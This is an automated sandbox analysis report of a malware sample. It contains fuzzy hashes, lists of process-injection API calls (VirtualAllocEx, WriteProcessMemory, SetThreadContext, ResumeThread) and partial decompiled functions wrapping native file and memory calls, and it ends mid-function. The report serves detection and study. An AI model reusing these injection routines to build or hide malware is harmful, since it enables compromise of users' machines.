                                                                                        • API String ID:
                                                                                        • Opcode ID: 9733d53d4903d4f86056c9a390de2457c719f6ac101ae38e56de9d8c909ffd40
                                                                                        • Instruction ID: 88dbc9605e37032c7b967b0dd6a237653b429927081227f3fcf92f32406008f3
                                                                                        • Opcode Fuzzy Hash: 9733d53d4903d4f86056c9a390de2457c719f6ac101ae38e56de9d8c909ffd40
                                                                                        • Instruction Fuzzy Hash: 7BB15A70E092888FCB09CFA9C8945DDFFB2BF89300F24946AD455AB261D7359A45CF11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8888f178a85592dba4427fe5d38cdbff7ddd8ca808bedefe68a9c99eaeb448e
                                                                                        • Instruction ID: a261bd8642f20de11d1f62f79cb89069c57f65a1106a083d262d0d7194a184c9
                                                                                        • Opcode Fuzzy Hash: d8888f178a85592dba4427fe5d38cdbff7ddd8ca808bedefe68a9c99eaeb448e
                                                                                        • Instruction Fuzzy Hash: 5981D374E046088FDB08CFEAC9946AEFBB2BF88310F24952AD415BB364D7359905CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e14d5c16d36b8f900bd5a8b7865180136f25479d30cc96f899fab30ec57db92e
                                                                                        • Instruction ID: e62ff6b337d332ede4261919728921b2360055a0aaddd0a4b5808645ce990690
                                                                                        • Opcode Fuzzy Hash: e14d5c16d36b8f900bd5a8b7865180136f25479d30cc96f899fab30ec57db92e
                                                                                        • Instruction Fuzzy Hash: AF513870E046598FCB08CFAAC9405AEFBF2FF89300F25C56AD419B7265D7349A41DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5640982490f5c73a1a9f4ea6992169b11cba343004df377f1581af05bf8c9a40
                                                                                        • Instruction ID: 446913cc0730ea7caa056ec4ba66f8aed199e5372b9217b6e866747ca50fcd10
                                                                                        • Opcode Fuzzy Hash: 5640982490f5c73a1a9f4ea6992169b11cba343004df377f1581af05bf8c9a40
                                                                                        • Instruction Fuzzy Hash: B4411771E056489FDB18CFABD85069EFBF3AFC9300F14C0AAC419AB265DB305A458F61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b28cac6297a00cbceb14cd9b7f447b74c6b426b915515358873b2b23c4290257
                                                                                        • Instruction ID: fb25b7b0195f36981667c3e66c2bf8dbc43acad0cf82cbdd6226b628b98d1a8a
                                                                                        • Opcode Fuzzy Hash: b28cac6297a00cbceb14cd9b7f447b74c6b426b915515358873b2b23c4290257
                                                                                        • Instruction Fuzzy Hash: 1231C6B1E016588BDB18CFABD9542DEFBF7AFC9301F18C06AD409AA264DB341A45CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001ED05F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001ECAD3

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001EC982

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001ECC12

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001EC257

                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 001EC136
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 610dbd2533f33ea34a08b78ea6afb3d5b5ec61b34a39bd93c497feaec1235b91
                                                                                        • Instruction ID: cdfb227b23f53524194c0d0023a5b0e7a7c74fddc992bcb67d9abb2d3f6e95b6
                                                                                        • Opcode Fuzzy Hash: 610dbd2533f33ea34a08b78ea6afb3d5b5ec61b34a39bd93c497feaec1235b91
                                                                                        • Instruction Fuzzy Hash: 8631CCB5D052589FCF14CFA9E884ADEFBB0BB49314F24842AE815B7300D735A906CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: MYG$MYG$MYG
                                                                                        • API String ID: 0-4256688356
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -u$0o.S$0o.S
                                                                                        • API String ID: 0-3828147270
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -$ $A_
                                                                                        • API String ID: 0-1870412770
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GuA
                                                                                        • API String ID: 0-3525248067
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <[`
                                                                                        • API String ID: 0-4103397427
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f26f7a70fe3558cee0ca3a9f9b280428130449f40f4a1a5cc7a44d59f17840f
                                                                                        • Instruction ID: 558da38372b447063fcb909b86ac0cc15db40d9a9d48aba29ed96d2347b301f6
                                                                                        • Opcode Fuzzy Hash: 7f26f7a70fe3558cee0ca3a9f9b280428130449f40f4a1a5cc7a44d59f17840f
                                                                                        • Instruction Fuzzy Hash: 5EB10470E05659CFCB08CFEAC5409DEFBF2AF88311F65852AD409AB254E734A942CB65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 14890ca81f45421a459f4c584d8b66fca213c7f52cf09f496b70feff732190fe
                                                                                        • Instruction ID: c8394e939bec1ed97ac4fb31c72aa6b58d4b3343680dd6174dd6265a6663f0f9
                                                                                        • Opcode Fuzzy Hash: 14890ca81f45421a459f4c584d8b66fca213c7f52cf09f496b70feff732190fe
                                                                                        • Instruction Fuzzy Hash: 74612570E0161ADFCB48CFA6C8816EEBBB2FF89310F64952AD416B7354D7349A42CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: baee374aba40ddb1ebd6132e85151665ccbfbaf45077db23c2471a3cea3ff3b7
                                                                                        • Instruction ID: f8a161fc0dc88236fb8f9fea8b96e2151ed0635f4d33520f9f8a33d5c4359880
                                                                                        • Opcode Fuzzy Hash: baee374aba40ddb1ebd6132e85151665ccbfbaf45077db23c2471a3cea3ff3b7
                                                                                        • Instruction Fuzzy Hash: 4241F870E0865A9FDB08CFE6C9815AEFBF2BF88310F28C46AC415A7254D3749A41CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bfecd78659e1554283f11a98a106c94ec172c3de3acfa593174347ddd409bb30
                                                                                        • Instruction ID: 6a896c9893d39c8b015749427466d7fe670811fb70a8c8e60fc855de734ab183
                                                                                        • Opcode Fuzzy Hash: bfecd78659e1554283f11a98a106c94ec172c3de3acfa593174347ddd409bb30
                                                                                        • Instruction Fuzzy Hash: 7C410870E0865A9FDB08CFEAC9815AEFBF2BF98310F24C46AC415A7254D3749A419F94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 73cf31811047c5d7a50b0c0808dc2d93b904cd9e64f58e4e7391a9b623014756
                                                                                        • Instruction ID: 4fd5571a7f8c5fd8f82e1aaa27e8d2759ff13bd6e1bacd5932a7fa8f398215d6
                                                                                        • Opcode Fuzzy Hash: 73cf31811047c5d7a50b0c0808dc2d93b904cd9e64f58e4e7391a9b623014756
                                                                                        • Instruction Fuzzy Hash: 1241FA70E05A4ADFCB48CFA6C5814AEFBB2BF89300F24C56AC519B7215D7349A41CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 978a0d0aa942059b0ad69a90e037035b9bc30afbebcd07a276c15cf5a28e25d5
                                                                                        • Instruction ID: 2dad338a1354886260ab3d87a91a5ced12dab19a38995b24d75d3bfcf198db6e
                                                                                        • Opcode Fuzzy Hash: 978a0d0aa942059b0ad69a90e037035b9bc30afbebcd07a276c15cf5a28e25d5
                                                                                        • Instruction Fuzzy Hash: 8941DA70E05A0ADFCB48CFDAC5815AEFBF2BB89300F24C569C519B7215D7349A41CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        C-Code - Quality: 37%
                                                                                        			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                        				void* _t18;
                                                                                        				void* _t27;
                                                                                        				intOrPtr* _t28;
                                                                                        
                                                                                        				_t13 = _a4;
                                                                                        				_t28 = _a4 + 0xc48;
                                                                                        				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                        				_t6 =  &_a32; // 0x413d52
                                                                                        				_t12 =  &_a8; // 0x413d52
                                                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                        				return _t18;
                                                                                        			}







                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID: R=A$R=A
                                                                                        • API String ID: 2738559852-3742021989
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00409B20(signed char __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                        				char* _v8;
                                                                                        				struct _EXCEPTION_RECORD _v12;
                                                                                        				struct _OBJDIR_INFORMATION _v16;
                                                                                        				char _v536;
                                                                                        				void* _t15;
                                                                                        				struct _OBJDIR_INFORMATION _t17;
                                                                                        				struct _OBJDIR_INFORMATION _t18;
                                                                                        				void* _t32;
                                                                                        				void* _t33;
                                                                                        				void* _t34;
                                                                                        
                                                                                        				_v8 =  &_v536;
                                                                                        				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                                        				_t33 = _t32 + 0xc;
                                                                                        				if(_t15 != 0) {
                                                                                        					_t17 = E0041AF70(__eflags, _v8);
                                                                                        					_t34 = _t33 + 4;
                                                                                        					__eflags = _t17;
                                                                                        					if(_t17 != 0) {
                                                                                        						E0041B1F0(__ebx, __edi,  &_v12, 0);
                                                                                        						_t34 = _t34 + 8;
                                                                                        					}
                                                                                        					_t18 = E00419300(_v8);
                                                                                        					_v16 = _t18;
                                                                                        					__eflags = _t18;
                                                                                        					if(_t18 == 0) {
                                                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                        						return _v16;
                                                                                        					}
                                                                                        					return _t18;
                                                                                        				} else {
                                                                                        					return _t15;
                                                                                        				}
                                                                                        			}














                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                        				long _t21;
                                                                                        				void* _t31;
                                                                                        
                                                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                                                        				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                        				return _t21;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 79%
                                                                                        			E0041839A(void* __eax, void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                        				long _t26;
                                                                                        
                                                                                        				asm("outsd");
                                                                                        				_t22 = _a4;
                                                                                        				_t13 = _t22 + 0xc60; // 0xca0
                                                                                        				E00418DC0(__edi, _a4, _t13,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                        				_t26 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                        				return _t26;
                                                                                        			}





                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                        				long _t14;
                                                                                        				void* _t21;
                                                                                        
                                                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                                                        				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                        				return _t14;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004182F0(intOrPtr _a4, void* _a8) {
                                                                                        				long _t8;
                                                                                        				void* _t11;
                                                                                        
                                                                                        				_t5 = _a4;
                                                                                        				_t2 = _t5 + 0x10; // 0x300
                                                                                        				_t3 = _t5 + 0xc50; // 0x409743
                                                                                        				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                        				_t8 = NtClose(_a8); // executed
                                                                                        				return _t8;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                        • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                        • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 95%
                                                                                        			E004088B0(intOrPtr* _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				char _v24;
                                                                                        				char _v284;
                                                                                        				char _v804;
                                                                                        				char _v840;
                                                                                        				void* __ebx;
                                                                                        				void* _t24;
                                                                                        				signed int _t31;
                                                                                        				signed int _t33;
                                                                                        				void* _t34;
                                                                                        				signed int _t39;
                                                                                        				void* _t50;
                                                                                        				intOrPtr* _t53;
                                                                                        				void* _t56;
                                                                                        				void* _t57;
                                                                                        				void* _t58;
                                                                                        				void* _t59;
                                                                                        
                                                                                        				_t53 = _a4;
                                                                                        				_t39 = 0; // executed
                                                                                        				_t24 = E00406E00(_t53,  &_v24); // executed
                                                                                        				_t57 = _t56 + 8;
                                                                                        				if(_t24 != 0) {
                                                                                        					E00407010( &_v24,  &_v840);
                                                                                        					_t58 = _t57 + 8;
                                                                                        					do {
                                                                                        						E00419CD0( &_v284, 0x104);
                                                                                        						_t47 =  &_v284;
                                                                                        						E0041A340( &_v284,  &_v804);
                                                                                        						_t59 = _t58 + 0x10;
                                                                                        						_t50 = 0x4f;
                                                                                        						while(1) {
                                                                                        							_t31 = E00413DD0(_t39, _t47, __eflags, E00413D70(_t53, _t50),  &_v284);
                                                                                        							_t59 = _t59 + 0x10;
                                                                                        							__eflags = _t31;
                                                                                        							if(_t31 != 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_t50 = _t50 + 1;
                                                                                        							__eflags = _t50 - 0x62;
                                                                                        							if(_t50 <= 0x62) {
                                                                                        								continue;
                                                                                        							} else {
                                                                                        							}
                                                                                        							L8:
                                                                                        							_t33 = E00407040( &_v24,  &_v840);
                                                                                        							_t58 = _t59 + 8;
                                                                                        							__eflags = _t33;
                                                                                        							if(_t33 != 0) {
